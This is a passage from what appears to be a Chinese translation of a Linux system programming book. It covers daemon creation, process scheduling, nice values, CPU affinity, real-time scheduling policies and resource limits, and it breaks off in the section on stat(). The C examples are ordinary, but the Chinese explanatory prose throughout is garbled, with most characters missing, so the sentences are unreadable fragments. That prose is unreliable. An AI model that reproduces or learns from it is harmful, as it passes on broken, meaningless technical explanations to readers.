int main (void)
{
pid_t pid;
int i;
/* create new process */
pid = fork ( );
if (pid == -1)
return -1;
else if (pid != 0)
exit (EXIT_SUCCESS);
/* create new session and process group */
if (setsid ( ) == -1)
return -1;
/* set the working directory to the root
directory */
– 170 –
5
进程理
if (chdir (”/”) == -1)
return -1;
/* close all open files--NR_OPEN is overkill,
but works */
for (i = 0; i < NR_OPEN; i++)
close (i);
/* redirect fd’s 0,1,2 to /dev/null */
open (”/dev/null”, O_RDWR);
/* stdin */
dup (0);
/* stdout */
dup (0);
/* stderror */
/* do its daemon thing... */
return 0;
}
Unix 们的 C 提 daemon() 工
作将的工作
#include <unistd.h>
int daemon (int nochdir, int noclose);
nochdir 零将工作。 noclose 零
的文件。进程设进程的属性
的。设 0。
时 0。时 -1。 errno 设 fork() 或 setsid() 的
。
5.8 总结
我们 Unix 进程理的进程的
进程的。我们进程理的 API进
程调方式的的 API。
– 171 –
6
进程理
第 6 章
高级进程管理
我们进程的、进程的
内。将 Linux 进程调及调然
进程理。调进程的调
调实或作出的。
6.1 进程调度
进程调内进程以的件进程调
—— 调 —— 的处理给进程的内子。
作出的程调处理效率进程同时
、。
我们进程∗。的进程
的。进、读写文件、 I/O 件的进程时间
相的时间内 (相对
时间)进程的。进程
时间 (调给进程的时间)。内的
进程进程的时间内将出
进程时间将。
进程 ()调。
进程处理时调能的。然
进程进程进程何时时间
调的。
操作能单处理上进程同时
进程操作的。处理上操作
进程同处理上。操作 DOS
能。
操作同式式。 Linux 实式的
调以进程处理进程。
∗: 原文 runnable process
– 172 –
6
进程理
的进程的的进程的时
间进程时间 (调给进程的小时间)。
同进程自。我们进程
自的出。理进程出操作绝
出。或的程能时间
。原操作
Linux 。
2.5 内的 O(1) 进程调 Linux 调∗的。 Linux 调
处理处理内存
(NUMA)实时进程自性。
6.1.1 大 O 记法
O(1) O 的子示的性扩展性。式
if f(x) is O(g(x)),
then
∃c, x1 such that f(x) ≤ c ∗ g(x), ∀x > x1
的以 f 示 x x1 f
小 g 上即 g f g f 的上。
O(1) 的小 c的
进程 Linux 进程调。对调新进程
进程 O(1) 对性能。单
的调 (以的 Linux 调)进程的进程
的的。给进程调性。
Linux 调时间内的
。
6.1.2 时间片
Linux 给进程的时间对性能。时间
进程时间能小的性
∗对的读以内的 kernel/sched.c 文件
– 173 –
6
进程理
的相的时间时间进程调上程的
时间性能。
的时间绝。给进程时间
率。给的时间的
性能。我们将 Linux 进程时间方
。
: 进程时间。 100ms 时
间的进程能 20ms 。时调
时进程出子
空调进程。进程的 80ms 或
。
6.1.3 I/O 约束进程 Vs. 处理器约束进程
时间的进程处理进程∗。进程
CPU 时间调的时间。单的子
的子处理。
方时间处的的进程I/O 进
程†。 I/O 进程文件 I/O或
。 I/O 程的子文件实程 cp 或 mv们
内 I/O 操作 GUI 程时
。
处理程 I/O 程调对同程的
同。处理程能的时间存率 (时
间性)。相 I/O 程时间
们出 I/O 内的段时间。然
I/O 程能调的。调的 I/O
程能件。更进步
的程调的给的。
处理程 I/O 程的同绝。 Linux 调
对 I/O 程 I/O 程处理程
∗process-bound
†I/O-bound
– 174 –
6
进程理
。
实上程处理 I/O 的。
子。对给程能
的时间进程能同的。
6.1.4 抢占调度
进程时间的时调新的
进程。的进程内给时间的进程新的时间
。即进程 — 进程
进程时间或的进程。
Unix 调的原: 的进程。
进程内空进程 (idle process)。实上空
进程进程能实 ()。空进程
调方的程空时间空进程的时间。
进程时进程 (进程
单)进程进
程。的进程的进程
的进程。
6.1.5 线程
程进程的单的进程程。程
自处理自的存处理。然
进程程进程实以程程
同的同空间 (同的内存映射文件
)的文件内。
Linux 内对程的。上内程对
Linux 内的程的进程。上进程
进程内的程。内程的进程
内进程的程内 (空间
的文件) 的同进程。
程程程的程。 Linux 上程程的
API IEEE Std 1003.1c-1995(POSIX 1995 or POSIX.1c) 的 API
– 175 –
6
进程理
们实 API 的pthreads。程程的相 API
。 pthreads 的内相
pthreads 的上。
6.2 让出处理器
然 Linux 操作提调
进程出处理调进程。
#include <sched.h>
int sched_yield (void);
调 sched yield() 将进程新进程内
进程。进程出的进程
。性上们以更的
调。
调 0 -1设errno。 Linux 内的
Unix 上 sched yield() 能 0。然谨的程
:
if(sched_yield ())
perror (”sched_yield”);
6.2.1 合理使用
Linux 的理 sched yield() 的
。内能作出效率的调内然
的程更何时进程同
同对的同理。
调程
件或进程的件。进程
进程出处理进程的。以
/ 单的实:
/* the consumer... */
– 176 –
6
进程理
do {
while (producer_not_ready ())
sched_yield ();
process_data ();
} while (!time_to_quit ());
的 Unix 程写。 Unix 程件
的 () sched yield()。
读的时。空间进程
进程同的给内对内以进程的方式
理的时。 Unix 程
文件上的件。
的 sched yield(): 空间程。
程程的的时程出处理
。内空间的时方单效。然 Linux
程实 (the New POSIX Threading Library, or NPTL)
的方即内提空间的。
sched yield() 的更 (playing nicely): 处理
集的程以时调 sched yield() 对的。出
。内能进程作出更的调
操作的调进程。对调
I/O 集程处理集程的。处理
集程的程的的
程。以将的 “nice” 给程性能
的设。
6.2.2 让出处理器方法的过去和现状
2.6 内以调 sched yield() 单的作。
进程内进程进程的内
调进程。然能进程进程。
2.6 内调:
1. 进程实时进程将的 (以
)。步。 (实时进程读实时
– 177 –
6
进程理
。)
2. 进程出进程。
进程时间进程能的进程新进
。
3. 调进程。
调 sched yield() 的实作进程时间同
内的处理时 sched yield() 的效 (同进程
然我)。
的原的理。
进程 A B 调 sched yield()。设们的进程 (
以进程进程时间)。以的 sched yield()内
调进程进程进程进程的时间
。我们以内的调 “A, B, A, B, A, B”
。
2.6 内。 A 出处理的时调将
出。 B 出。进程的时调
然 A B, 效进程处理时
间。
进程出处理的时真的出处理!
6.3 进程优先级
的实时进程实时
进程同的调的以。
Linux 进进程调。进程们
何时的。上 Unix
nice values的进程进程更的处理时
间进程对的进程更。
“nice value” 进程的时的 Linux 调的原
调的程。同时 nice 进程的时间
。
– 178 –
6
进程理
的 -20 19 间 0。的 nice
时间相 nice 时间
进程的 nice 进程对更。
。我们进程的时我们进程更
更的时间然对的更。
6.3.1 nice()
Linux 提设进程 nice 的调单的 nice():
#include <unistd.h>
int nice (int inc);
调 nice() 将 上 inc 新 。
CAP SYS NICE 能 (实上 root 的进程) 能 inc
。 root 进程能 ( nice )。
nice() -1, -1 能时的
调对 errno 0调。:
int ret;
errno = 0;
ret = nice (10);
/* increase our nice by 10 */
if (ret == -1 && errno !=0)
perror (”nice”);
else
printf (”nice value is now %d\n”, ret);
对 nice() Linux : EPERM进程提
CAP SYS NICE 能。的 nice 超出的时
EINVAL Linux 的对的上。
0 给 nice() 的单方:
printf(”nice value is currently %d\n”, nice (0));
进程设绝对的相对的时以的
:
– 179 –
6
进程理
int ret, val;
/* get current nice value */
val = nice (0);
/* we want a nice value of 10 */
val = 10 - val;
errno = 0;
ret = nice (val);
if (ret == -1 && errno != 0)
perror (”nice”);
else
printf (”nice value is now %d\n”, ret);
6.3.2 getpriority() 和 setpriority()
更的方 getpriority() setpriority() 调以更的
能然更
#include <sys/time.h>
#include <sys/resource.h>
int getpriority (int which, int who);
int setpriority (int which, int who, int prio);
作 “which” “who” 的 进 程进 程 或
which的 PRIO PROCESS、 PRIO PGRP 或 PRIO USER对
who进程 ID进程 ID 或 ID。who 0 的时
进程进程或。
getpriority() 进程的 (nice 小) setpriority() 将
进程的设prio。同 nice() CAP SYS NICE 能
的进程能提进程的 ( nice )更进步
的进程能调属的进程的。
getpriority() 的时 -1 -1 能的同
nice() 处理程调空 error 。 setpriority()
0 -1。
进程的子:
– 180 –
6
进程理
int ret;
ret = getpriority (PRIO_PROCESS, 0);
printf (”nice value is %d\n”, ret);
设进程进程 10 的子:
int ret;
ret = setpriority (PGIO_PGRP, 0, 10);
if (ret == -1)
perror (”setpriority”);
的时设 errno 以:
EACCESS 进程 CAP SYS NICE 能提进程。 (
setpriority())
EINVAL
“which” 的 PRIO PROCESS, PRIO PGRP 或 PRIO USER 。
EPERM
的进程效 ID 调进程效 ID 调进程
CAP SYS NICE 能。 ( setpriority())
ESRCH
存whichwho的进程。
6.3.3 I/O 优先级
作进程的 Linux 进程 I/O 内 I/O 调
() 自 I/O 的。
I/O 调进程 I/O 设
自 I/O 。然 Linux 内调单设
I/O:
int ioprio_get (int which, int who)
int ioprio_set (int which, int who, int ioprio)
内出调 glibc 提空间
。 glibc 的相的。以 glibc
的时能调同。方操作
进程 I/O : nice 或 “ionice”∗的实程。
∗ionice util-linux 的以 http://www.kernel.org/pub/linux/utils/utl-linux 以
GNU General Public License v2
– 181 –
6
进程理
的 I/O 调 I/O Complete Fair Queu-
ing(CFQ) I/O 调的调。 I/O 调 I/O
相调何提示。
6.4 处理器亲和度
Linux 以处理进程处理的
工作进程调。对处理 (SMP) 上进程调
CPU 上进程: 调
的处理处理空。然进程 CPU 上
进程调同 CPU 上处理间的进程
性能。
的性能自的存效†。 SMP 的设
处理的存自的处理存的。
进程新处理上写新内存时原处理的存
能。存读新的内存时
存效。时处理的存效
(设存)。进程的时方的相: 进程能
存原存的效。进程调
进程处理。
实上进程调的的。处理处
理的进程 — 或更处理处理空
— 新调进程 CPU 上的。何时进程
对 SMP 的性能。
处理进程同处理上的能性。
(soft affinity) 调调进程同处理上的自然上文
的以的性。 Linux 调能
的时进程小的存效
能的处理。
然时或程进程处理间的
进程存‡同处理的。
†:cache effects
‡: cache-sensitive
– 182 –
6
进程理
(hard affinity) 内进程处理的。
6.4.1 sched getaffinity() 和 sched setaffinity()
进程进程处理能何 CPU
上。 Linux 提调设进程的‡:
#define _GNU_SOURCE
#include <sched.h>
typedef struct cpu_set_t;
size_t CPU_SETSIZE;
void CPU_SET (unsigned long cpu, cpu_set_t *set);
void CPU_CLR (unsigned long cpu, cpu_set_t *set);
int CPU_ISSET (unsigned long cpu, cpu_set_t *set);
void CPU_ZERO (cpu_set_t *set);
int sched_setaffinity (pid_t pid, size_t setsize,
const cpu_set_t *set);
int sched_getaffinity (pid_t pid, size_t setsize,
const cpu_set_t *set);
调 sched getaffinity() 以 “pid” 的进程的处理存
cpu set t 以的。pid 0进程的
。setsize cpu set t 的小 glibc 将时
然性。的时 0 -1设 errno。子
:
cpu_set_t set;
int ret, i;
CPU_ZERO (&set);
ret = sched_getaffinity (0, sizeof (cpu_set_t),
&set);
if (ret == -1)
perror (”sched_getaffinity”);
‡: hard affinity
– 183 –
6
进程理
for (i = 0; i< CPU_SETSIZE; i++) {
int cpu;
cpu = CPU_ISSET (i, &set);
printf (”cpu=%i is %s\n”, i, cpu ? ”set” :
”unset” );
}
调 我 们 CPU ZERO 零 的 进 然 0
CPU SETSIZE set 上的。 CPU SETSIZE set 的小 — 然
能示 setsize— set 能示的处理。的实 1
进示处理以 CPU SETSIZE sizeof(cpu set t) 。我们
CPU ISSET 的处理进程 0 示 0
。
实存的处理能处理的上上
将:
cpu=0 is set
cpu=1 is set
cpu=2 is unset
cpu=3 is unset
...
cpu=1023 is unset
出以的 CPU SETSIZE( 0 ) 1,024。
我们 CPU #0 #1 存的处理我们我们的进
程 CPU #0 上。:
cpu_set_t set;
int ret, i;
CPU_ZERO (&set);
/* clear all CPUs */
CPU_SET (0, &set);
/* allow CPU #0 */
CPU_CLR (1, &set);
/* forbid CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t),
&set);
– 184 –
6
进程理
if (ret == -1)
perror (”sched_setaffinity”);
for (i = 0; i < CPU_SETSIZE; i++) {
int cpu;
cpu = CPU_ISSET (i, &set);
printf (”cpu=%i is %s\n”, i, cpu ? ”set” :
”unset”);
我们 CPU ZERO 零 set然 CPU SET 对 CPU #0 1,
CPU CLR 对 CPU #1 0。 零 set 以 CPU CLR 零
的处性的。
同的处理上同的出:
cpu=0 is set
cpu=1 is unset
cpu=2 is unset
...
cpu=1023 is unset
CPU #1 进程何 CPU #0 上。
能的:
EFAULT 提的进程的空间或效。
EINVAL 处理调 ( sched setaffinity())或 set-
size 小内示处理集的的小。
EPERM
pid 的 进 程 属 调 进 程 的 效 ID 进 程
CAP SYS NICE 能。
ESRCH
pid 的进程存。
6.5 实时系统
实时的。
操作∗— 间的小 — 的
∗: operational deadlines
– 185 –
6
进程理
实时的。上以的 (ABS)
的实时。的时内
调以
性能。的操作能相
能。
Linux 内的操作提的实时。
6.5.1 软硬实时系统
实时实时。实时对操作
超。方实时超
的。
实时: 、、设备、处理
的子。实时的子
处理程: 超操作时的
以的。
的时间能满
程。文程能
或的。
实时然写程的时们及时
。的操作实时程的。
同实时。实上相同的件件
实时更能实时原即
实时进程的。的实时的同操作
时的。的子出的内 SCRAM
的能。操作的实
时。相能 100ms 内
或出的对操作的实
时。
6.5.2 延时,抖动和截止期限
时的时间时小操作
。实时操作时的以的间
– 186 –
6
进程理
时处理。实时时出
内。
时的时间。然给
上时间及时的能。的的方
处理实上们时间的。件间的时间
时。
10ms 的。性能我们给上
时间 10ms 间的我们的
间的。的时间我们
间的时间即 10ms 我们何时
。或更的时的实
时。以的的的
的。何我们对实
实时出小的们段时间
段时间内。零时操作间。时超
间。
实时对更。理时间操作
间内时。以时作性
能的。
6.5.3 Linux 的实时支持
Linux IEEE Std 1003.1b-1993(写 POSIX 1993 或 POSIX.1b) 的
调程提实时。
上 POSIX 提的实时。实
上 POSIX 的调操作何时
间操作设。
Linux 内性能的的实时
提小的时更的。原进能
程 I/O 进程实时进对
Linux 式实时的献。
的式实时对 Linux 内的存
的 Linux 方的方内。的进步
– 187 –
6
进程理
时实时的。的方内内
。的实时 POSIX 的
。
6.5.4 Linux 调度策略和优先级
linux 对进程的调进程的调调。 Linux
提实时调作的。文件 <sched.h> 的
示: SCHED FIFO, SCHED RR SCHED OTHER。
进程 nice 的对程
0对实时程 1 99。 Linux 调的进程
(的进程)。 50 的进程时
51 的进程调进程新的
进程。相 49 的进程
50 的进程。进程 0以实时进程
实时进程。
6.5.4.1 “先进先出”策略
进出 (FIFO) 时间的单的实时。
进程 FIFO 进程 SCHED FIFO 示。
时间的操作相单:
• 的 FIFO 进程的进程
。的 FIFO 进程进程。
• FIFO 进程或调 sched yield()或进
程。
• FIFO 进程时调将出。时
相同进程的。或同进程
。
• FIFO 进程调 sched yield() 时调将同的
同进程。同
进程 sched yield() 将作。
• FIFO 进程的。
进程的 FIFO 进程。
– 188 –
6
进程理
• 进程 FIFO 或进程将相
的。新的 FIFO 进程能同进程。
上我们以 FIFO 进程能
。的同的 FIFO 进程间的。
6.5.4.2 轮转策略
FIFO 处理同进程的
以 SCHED RR 示。
调给 RR 进程时间。 RR 进程时间
时调将的方式 RR 进程间能
调。进程给上 RR 同 FIFO
时间然。
我们以 RR 进程同 FIFO 进程时间的时
同的。
SCHED FIFO 或 SCHED RR 内的操作 RR
的时间相同的进程间相。 FIFO 进程 RR 进程
给进程间调出进程进程的
。
6.5.4.3 普通调度策略
SCHED OTHER 调的实时进程。
进程的 0 FIFO 或 RR 进程们。
调的 nice 进程的
nice 的 0。
6.5.4.4 批调度策略
SCHED BATCH 调或空调的程上实时调
的对: 的进程进程时即
进程时间。同进程进程
进程时间。
6.5.4.5 设置 Linux 调度策略
进程以 sched getscheduler() sched setscheduler() 操作 Linux 调
:
– 189 –
6
进程理
#include <sched.h>
struct sched_param {
/* ... */
int sched_priority;
/* ... */
};
int sched_getscheduler (pid_t pid);
int sched_setscheduler (pid_t pid, int policy,
const struct sched_param *sp);
对 sched getscheduler() 的调将 pid 进程的调
pid 0 调 进 程 的 调 。 <sched.h>
示 调 :SCHED FIFO 示 进 出 SCHED RR 示
SCHED OTHER 示进程。 -1(-1 效的调
)同时设。
单:
int policy;
/* get out scheduling policy */
policy = sched_getscheduler (0);
switch (policy) {
case SCHED_OTHER:
printf (”Policy is normal\n”);
break;
case SCHED_RR:
printf (”Policy is round-robin\n”);
break;
case SCHED_FIFO:
printf (”Policy is fist-in, first-out\n”);
break;
case -1:
perror (”sched_getscheduler”);
break;
– 190 –
6
进程理
default:
fprintf (stderr, ”Unknown policy!\n”);
}
调 sched setscheduler() 将设 pid 进程的调的
sp 。 pid 0 时进程将设自的。
0 -1 设。
sched param 的 效 段 操 作 的 调 。
SCHED RR SCHED FIFO 段 sched priority
。 SCHED OTHER 何段然的调能。
的程对的布作出何设。
设进程调单:
struct sched_param sp = { .sched_priority = 1 };
int ret;
ret = sched_setscheduler (0, SCHED_RR, &sp);
if (ret == -1) {
perror (”sched_setscheduler”);
return 1;
}
设调进程调 1。我们设 1 效
— 上。我们何效
。
设 SCHED OTHER 的 调 CAP SYS NICE 能
root 实时进程。 2.6.12 内 RLIMIT RTPRIO
root 上内设实时。
。时设:
EFAULT sp 的内存或。
EINVAL policy 的调效或 sp 给的 (实
sched setscheduler())。
EPERM
调进程备的能。
ESRCH
pid 的进程。
– 191 –
6
进程理
6.5.5 设置调度参数
POSIX 的 sched getparam() sched setparam() 以设
调的相:
#include <sched.h>
struct sched_param {
/* ... */
int sched_priority;
/* ... */
};
int sched_getparam (pid_t pid, struct sched_param
*sp);
int sched_setparam (pid_t pid, const struct
sched_param *sp);
sched getscheduler() 调 sched getparam() 将 pid 进程
的调存 sp :
struct sched_param sp;
int ret;
ret = sched_getparam (0, &sp);
if (ret == -1) {
perror (”sched_getparam”);
return 1;
}
printf (”Our priority is %d\n”,
sp.sched_priority);
pid 0调进程的。 0 -1设。
sched setscheduler() 能设何调以 sched setparam()
:
struct sched_param sp;
int ret;
– 192 –
6
进程理
sp.sched_priority = 1;
ret = sched_setparam (0, &sp);
if (ret == -1) {
perror (”sched_setparam”);
return 1;
}
sp 设 pid 进程的调 0。
-1设 errno。
我们上文段的出:
Our priority is 1
子设 1 时实的程
。我们何效的。
6.5.5.1 错误码
能设:
EFAULT sp 的内存或。
EINVAL sp 给的 (实 sched getparam())。
EPERM
调进程备的能。
ESRCH
pid 的进程。
6.5.5.2 确定有效优先级的范围
上的子我们调。 POSIX 能
上的调 32 。Linux
调我们提 Linux 实时调提 1
99 99 。的程实自的然映射
操作的上。同的实时以
。
Linux 提调小
:
#include <sched.h>
– 193 –
6
进程理
int sched_get_priority_min (int policy);
int sched_get_priority_max (int policy);
sched get priority min()
小
sched get priority max() policy 的 效 。
调 0调 -1, 能的 policy 时
设 EINVAL。
单:
int min, max;
min = sched_get_priority_min (SCHED_RR);
if (min == -1) {
perror (”sched_get_priority_min”);
return 1;
}
max = sched_get_priority_max (SCHED_RR);
if (max == -1) {
perror (”sched_get_priority_max”);
return 1;
}
printf (”SCHED_RR priority range is %d - %d\n”,
min, max);
Linux 上:
SCHED_RR priority range is 1 - 99
的。的以设进程
的相的:
/*
* set_highest_priority – set the associated pid’s
scheduling
* priority to the highest value allowed by its
current
– 194 –
6
进程理
* scheduling policy. If pid is zero, sets the
current
* process’s priority.
*
* Returns zero on success.
*/
int set_highest_priority (pid_t pid)
{
struct sched_param sp;
int policy, max, ret;
policy = sched_getscheduler (pid);
if (policy == -1)
return -1;
max = sched_get_priority_max (policy);
if (max == -1)
return -1;
memset (&sp, 0, sizeof (struct sched_param));
sp.sched_priority = max;
ret = sched_setparam (pid, &sp);
return ret;
}
程的小或然 1 ( max-1, max-2
)给的进程。
6.5.6 sched rr get interval()
SCHED RR 进程 时间 SCHED FIFO 进程相
同。 SCHED RR 进程时间的时调将同的
。方式相同的 SCHED RR 进程。
进程时间进程 (同或的 SCHED FIFO 进
程) 。
POSIX 进程时间的:
– 195 –
6
进程理
#include <sched.h>
struct timespec {
time_t tv_sec;
/* seconds */
long
tv_nsec;
/* nanoseconds */
};
int sched_rr_get_interval (pid_t pid, struct
timespec *tp);
sched rr get interval() 的对的调将 pid
进程的时间存 tp 的 timespec 然 0
-1设 errno。
POSIX 能工作 SCHED RR 进程然 Linux 上
以进程的时间。能工作
Linux 的程以作的展。子:
struct timespec tp;
int ret;
/* get the current task’s timeslice length */
ret = sched_rr_get_interval (0, &tp);
if (ret == -1) {
perror (”sched_rr_get_interval”);
return 1;
}
/* convert the seconds and nanoseconds to
milliseconds */
printf (”Our time quantum is %.2lf
milliseconds\n”,
(tp.tv_sec * 1000.0f) + (tp.tv_nsec /
1000000.0f));
进程 FIFO tv sec tv nsec 0的时间
。
– 196 –
6
进程理
6.5.6.1 错误码
能的:
EFAULT tp 的内存效或。
EINVAL pid 效 ( pid )。
ESRCH
pid 效存的进程。
6.5.7 关于实时进程的一些提醒
实时进程的调程的时
。实时程能。程
实时程何处理的 — 或何的 —
。
设实时程小的程
。提:
• 何处理的或进程
。将。
• 实时进程的以设的时
的处理时间。
• 小。实时进程进程的
进程处。
• 实时程的时更的进
程。的进程。 (空
的时实时进程。)
• util-linux 工的 chrt 实程以设实时进程属性更
。以单程实时调的或
的实时。
6.5.8 确定性
实时进程性。实时给相同的
作相同的时间内相同的我们作的。
以的集: 存 ()处理
页作时间能。然我们
– 197 –
6
进程理
作 (相对) 的同时
我们作的时间。
实时性的时。的
的方。
6.5.8.1 数据故障预测和内存锁定
:ICBM() 件设备
件内。进程件
设备上内进程。内进程实时进程
进程将调实时进
程。调实时进程上文相的空间。进程
程 0.3ms 1ms 的内。
空间实时进程的 ICBM处理。
实时进程。 0.1ms ABM
。 — —ABM 的上。页处理
内式 I/O 出的。实时进程
处理页。
然页给实时进程性。
实时或将空间的页提
理内存出。页内将出
何页实时页理内
存。
Linux 方 提 。 Chapter 4 的
Chapter 8 将内存的。
6.5.8.2 CPU 亲和度和实时进程
实时的。然 Linux 内式的调
能调进程。时进程内的调
出时实时进程时将
超出操作。
页相的。对的方
: 。然提能单进程
以 Linux — 单的操作能满。的
– 198 –
6
进程理
处理以或实时进程。实效上
实时进程离。
操作进程 CPU 的调。的对实时进程
的实时进程处理的处理进程。
单的方 Linux 的 init 程 SysVinit∗, 以
的作:
cpu_set_t set;
int ret;
CPU_ZERO (&set); /* clear all CPUs */
ret = sched_getaffinity (0, sizeof (cpu_set_t),
&set);
if (ret == -1) {
perror (”sched_getaffinity”);
return 1;
}
CPU_CLR (1, &set); /* forbid CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t),
&set);
if (ret == -1) {
perror (”sched_setaffinity”);
return 1;
}
的处理集我们处理。然出
处理 CPU #1更新处理集。
处理集子进程间 init 进程的以
的进程的处理集 CPU #1 上将何进程。
实时程 CPU #1 上:
cpu_set_t set;
int ret;
∗SysVinit 以 ftp://ftp.cistron.nl/pub/people/miquels/sysvinit/ 以 GNU General
Public License v2
– 199 –
6
进程理
CPU_ZERO (&set); /* clear all CPUs */
CPU_SET (1, &set); /* allow CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t),
&set);
if (ret == -1) {
perror (”sched_setaffinity”);
return 1;
}
实时进程 CPU #1 上的进程处
理。
6.6 资源限制
Linux 内对进程的进程以的内的
上文件的内存页处理的。性
的内进程的超性。文件的操作
进程的文件超出 open() 调†。
Linux 提操作的调。 POSIX 的调
Linux getlimit() setlimit() 设:
#include <sys/time.h>
#include <sys/resource.h>
struct rlimit {
rlim_t rlim_cur; /* soft limit */
rlim_t rlim_max; /* hard limit */
};
int getrlimit (int resource, struct rlimit *rlim);
int setrlimit (int resource, const struct rlimit
*rlim);
RLIMIT CPU 的 示 rlimit 示 实
。 上 : 。内 对 进 程
†时调设 EMFILE进程文件上。 Chapter 2 open()
调
– 200 –
6
进程理
进程自以以 0 间的。备
CAP SYS RESOURCE 能的进程 ( root 进程)能调。
程能提的的调
的。进程以设。
的相。 RLIMIT FSIZE示进程以
的文件单。时 rlim cur 1024进程以
1K 的文件能扩展文件 1k 以上。
的: 0 。示
RLIMIT CORE 0内内存文件。相示存对
的。内 RLIM INFINITY 示 -1 (能
调 -1 相)。 RLIMIT CORE 内以
小的内存文件。
getrlimit() rlim 的 resource 的。
0 -1设。
相对的 setrlimit() rlim 的设 resource 的。
0内更新对的 -1设。
6.6.1 限制列表
Linux 提 15 :
• RLIMIT AS
进程空间上单。空间小超 — 调
mmap() brk() — ENOMEM。进程的自超
内将给进程 SIGSEGV 。的 RLIM INFINITY。
• RLIMIT CORE
内存文件小的单。 0超出的内存文件
将小 0将文件。
• RLIMIT CPU
进程以的 CPU 时间单。进程时间超出
将处理内出的 SIGXCPU 。程
时 POSIX 内的步作。进程然
Linux 进程给进程 SIGXCPU 。
进程将 SIGKILL 。
– 201 –
6
进程理
• RLIMIT DATA
进程段的小单。 brk() 扩段以超出
将 ENOMEM。
• RLIMIT FSIZE
文件以的文件单。进程扩展文件超出内
将 SIGXFSZ 。将进程。进程以
调 EFBIG 时自处理。
• RLIMIT LOCKS
进程以的文件的 (文件的)。
何的 ENOLCK。 Linux 2.4.25 内
能内以设何作。
• RLIMIT MEMLOCK
CAP SYS IPC 能的进程 ( root 进程) mlock() mlockall() 或
shmctl() 能 的 内 存 的 。 超 的 时 调
EPERM。实上实内存页。 CAP SYS IPC 能
的进程以的内存页效。 2.6.9 内
作 CAP SYS IPC 能的进程进程能内存页。
属 POSIX BSD 。
• RLIMIT MSGQUEUE
以 POSIX 的。新的超出
mp open() ENOMEM。属 POSIX 2.6.8 内
Linux 。
• RLIMIT NICE
进程以 nice (提) 的。文进程能
提 ()。理进程以提
的。 nice 能内 20 − rlim cur 示。
设 40进程 -20()。 2.6.12 内
。
• RLIMIT NOFILE
进程以的文件。何超出的
EMFILE。 BSD RLIMIT OFILE。
• RLIMIT NPROC
– 202 –
6
进程理
时的进程。何超出的 fork()
EAGAIN。属 POSIX BSD 。
• RLIMIT RSS
进程以内存的页 (即集小 RSS)。的 2.4 内
内设。属 POSIX BSD
。
• RLIMIT RTPRIO
CAP SYS NICE 能的进程以的实时。进
程实时调。属 POSIX 2.6.12 内 Linux
。
• RLIMIT SIGPENDING
。更的将 sigqueue() 的调
将 EAGAIN。以将的实
. 以进程 SIGKILL SIGTERM 。
属 POSIX Linux 。
• RLIMIT STACK
的。超出将 SIGSEGV 。
内以进程单理。子进程 fork 的时进程
exec 进。
6.6.1.1 默认限制
: 理。内
。内 init 进程设
子进程间的给的子进程。
– 203 –
6
进程理
Resource limit
Soft limit
Hard limit
RLIMIT AS
RLIM INFINITY
RLIM INFINITY
RLIMIT CORE
0
RLIM INFINITY
RLIMIT CPU
RLIM INFINITY
RLIM INFINITY
RLIMIT DATA
RLIM INFINITY
RLIM INFINITY
RLIMIT FSIZE
RLIM INFINITY
RLIM INFINITY
RLIMIT LOCKS
RLIM INFINITY
RLIM INFINITY
RLIMIT MEMLOCK
8 pages
8 pages
RLIMIT MSGQUEUE
800 KB
800KB
RLIMIT NICE
0
0
RLIMIT NOFILE
1024
1024
RLIMIT NPROC
0 (implies no limit)
0 (implies no limit)
RLIMIT RSS
RLIM INFINITY
RLIM INFINITY
RLIMIT RTPRIO
0
0
RLIMIT SIGPENDING
0
0
RLIMIT STACK
8 MB
RLIM INFINITY
以:
• 何进程以 0 的内以
子进程以 fork 。
• 进程以设子进程同以 fork
。
进程的 root 进程能何
更能的原。实上对进程的 shell
设理以进设提的。 Bourne-again
shell(bash) 理以 ulimit 设。理以
以提给提更理的。
RLIMIT STACK(上设 RLIM INFINITY) 进处理。
6.6.2 获取和设置资源限制
我们设。
单:
– 204 –
6
进程理
struct rlimit rlim;
int ret;
/* get the limit on core sizes */
ret = getrlimit (RLIMIT_CORE, &rlim);
if (ret == -1) {
perror (”getrlimit”);
return 1;
}
printf (”RLIMIT_CORE limits: soft=%ld hard=%ld\n”,
rlim.rlim_cur, rlim.rlim_max);
然将:
RLIMIT_CORE limits: soft=0 hard=-1
以 0 -1(-1 )。我们以设
。的子设内存文件 32MB:
struct rlimit rlim;
int ret;
rlim.rlim_cur = 32 * 1024 * 1024; /* 32 MB */
rlim.rlim_max = RLIM_INFINITY; /* leave it alone
*/
ret = setrlimit (RLIMIT_CORE, &rlim);
if (ret == -1) {
perror (”setrlimit”);
return 1;
}
6.6.2.1 错误码
能:
EFAULT rlim 的内存或。
EINVAL resource 的或 rlim.rlim cur 的 rlim.rlim max(
setrlimit())。
– 205 –
6
进程理
EPERM
调 CAP SYS RESOURCE 能提。
– 206 –
7
文件理
第 7 章
文件与目录管理
2 3 以及 4 我们给出文件 I/O 的方调。
我们上的文件读写操作
理文件及。
7.1 文件及其元数据
我们 1 的文件对 inode文件
( inode 。 inode unix 文件的理对
Linux 内的实。 inode 存文件的
文件的时间小以及文件
的存。
能 ls 的 -i 文件 inode
$ ls -i
1689459 Kconfig
1689461 main.c
1680144 process.c
1689464 swsusp.c
1680137 Makefile
1680141 pm.c
1680145 smp.c
1680149 user.c
1680138 console.c
1689462 power.h
1689463 snapshot.c
1689460 disk.c
1680143 poweroff.c
1680147 swap.c
出示文件 disk.c 的 inode 1689460。文件
何文件 inode (inode number)。文件
我们能同的 inode 。
7.1.1 一组 stat 函数
Unix 提文件的
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int stat (const char *path, struct stat *buf);
int fstat (int fd, struct stat *buf);
int lstat (const char *path, struct stat *buf);
– 207 –
7
文件理
文件的。 stat() path 的文件
fstat() 文件 fd 的文件。 lstat() stat()
对 lstat() 文件。
stat 存的文件。 stat <bits/stat.h>
真的 <sys/stat.h> 的
struct stat {
dev_t st_dev; /* ID of device containing file */
ino_t st_ino; /* inode number */
mode_t st_mode; /* permissions */
nlink_t st_nlink; /* number of hard links */
uid_t st_uid; /* user ID of owner */
gid_t st_gid; /* group ID of owner */
dev_t st_rdev; /* device ID (if special file) */
off_t st_size; /* total size in bytes */
blksize_t st_blksize; /* blocksize for
filesystem I/O */
blkcnt_t st_blocks; /* number of blocks
allocated */
time_t st_atime; /* last access time */
time_t st_mtime; /* last modification time */
time_t st_ctime; /* last status change time */
};
对段的
• 段 st dev 文件设备上(我们将设
备。文件设备上文件文件 (NFS)
上 0。
• 段 st ino 文件的 inode 。
